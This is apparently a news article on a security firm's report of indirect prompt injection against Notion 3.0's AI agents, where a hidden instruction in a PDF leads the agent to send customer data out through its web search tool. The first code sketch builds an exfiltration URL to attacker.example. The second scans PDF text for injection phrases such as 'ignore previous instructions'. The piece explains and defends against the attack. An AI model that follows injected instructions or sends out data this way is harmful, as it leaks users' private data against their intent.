With the release of Notion 3.0, its new autonomous AI agents have drawn significant attention: they are designed to help users automatically complete tasks such as drafting documents, updating databases, and managing workflows. However, a recent report from the cybersecurity firm CodeIntegrity reveals a serious security vulnerability in these agents: malicious files, such as PDFs, can be used to trick them into bypassing security protections and stealing sensitive data.


CodeIntegrity attributes the vulnerability to what it calls the "fatal trio" of AI agents: large language models (LLMs), tool access, and long-term memory. Its researchers point out that traditional access controls, such as role-based access control (RBAC), cannot provide adequate protection in this more complex environment.

The vulnerability centers on functions.search, Notion 3.0's built-in web search tool. Although it is designed to help AI agents retrieve external information, the same capability can be manipulated into a channel for data theft.
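To make the risk concrete, the sketch below shows in simplified form how a web-search or web-fetch style tool can double as an exfiltration channel: any data the agent is told to place into a URL it then "searches" or fetches leaves the workspace along with the request. The tool behavior, the attacker domain, the sample data, and the allowlist are illustrative assumptions, not Notion's actual internals.

```python
from urllib.parse import quote, urlparse

# Illustrative only: stand-in for whatever sensitive content the agent can read.
SENSITIVE_ROW = "acme-corp,renewal=2025-11,arr=120000"

def build_exfil_url(data: str) -> str:
    # An injected instruction only has to ask the agent to "look up" a URL
    # like this one; the sensitive data rides along in the query string.
    return f"https://attacker.example/collect?d={quote(data)}"

def is_allowed(url: str, allowlist: set[str]) -> bool:
    # One common mitigation sketch: restrict the hosts the search/fetch tool
    # may contact, so requests to arbitrary attacker domains are rejected.
    return urlparse(url).hostname in allowlist

url = build_exfil_url(SENSITIVE_ROW)
print(url)
print(is_allowed(url, allowlist={"notion.so", "developers.notion.com"}))  # False
```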

To prove the point, the CodeIntegrity team staged a proof-of-concept attack. They created a seemingly harmless PDF containing a hidden malicious instruction that directed the AI agent to upload sensitive customer data, via the web search tool, to a server under the attacker's control. Once a user uploaded the PDF to Notion and asked the agent to "summarize the report," the agent faithfully executed the hidden instruction, extracting the data and transmitting it out. Notably, the attack succeeded even with the advanced Claude Sonnet 4.0 model driving the agent, indicating that even an advanced model's built-in protections were not enough to stop it.
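One reason such payloads slip past a human reviewer is that the instructions can sit in the PDF's text layer while remaining invisible on the rendered page (white text or tiny fonts, for example). The sketch below, which assumes the pypdf library and a purely heuristic phrase list of my own choosing, shows one way a pipeline could surface that hidden text before handing a file to an agent; it is a rough check, not a reliable defense, and it is not part of CodeIntegrity's report.

```python
from pypdf import PdfReader  # assumption: pypdf is installed (pip install pypdf)

# Crude heuristic phrases often seen in prompt-injection payloads; purely
# illustrative and easy for a real attacker to evade.
SUSPICIOUS = (
    "ignore previous instructions",
    "do not tell the user",
    "send the data to",
    "http://",
    "https://",
)

def flag_hidden_instructions(path: str) -> list[tuple[int, str]]:
    """Return (page_number, matched_phrase) pairs found in the PDF's text layer.

    Text extraction ignores rendering color and size, so white-on-white or
    off-page text still shows up here even though a human reader never sees it.
    """
    hits = []
    reader = PdfReader(path)
    for page_no, page in enumerate(reader.pages, start=1):
        text = (page.extract_text() or "").lower()
        for phrase in SUSPICIOUS:
            if phrase in text:
                hits.append((page_no, phrase))
    return hits

if __name__ == "__main__":
    for page_no, phrase in flag_hidden_instructions("uploaded_report.pdf"):
        print(f"page {page_no}: contains '{phrase}'")
```

A filter like this catches only naive payloads; the report's broader argument is that untrusted content and powerful tools share the same context, so detection alone cannot close the gap.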

The report also warns that the issue is not limited to PDF files. Notion 3.0's AI agents can connect to third-party services such as GitHub, Gmail, and Jira, and any of these integrations can serve as a carrier for indirect prompt injection: malicious content pulled in from a connected service can steer the agent into actions that run counter to the user's intent.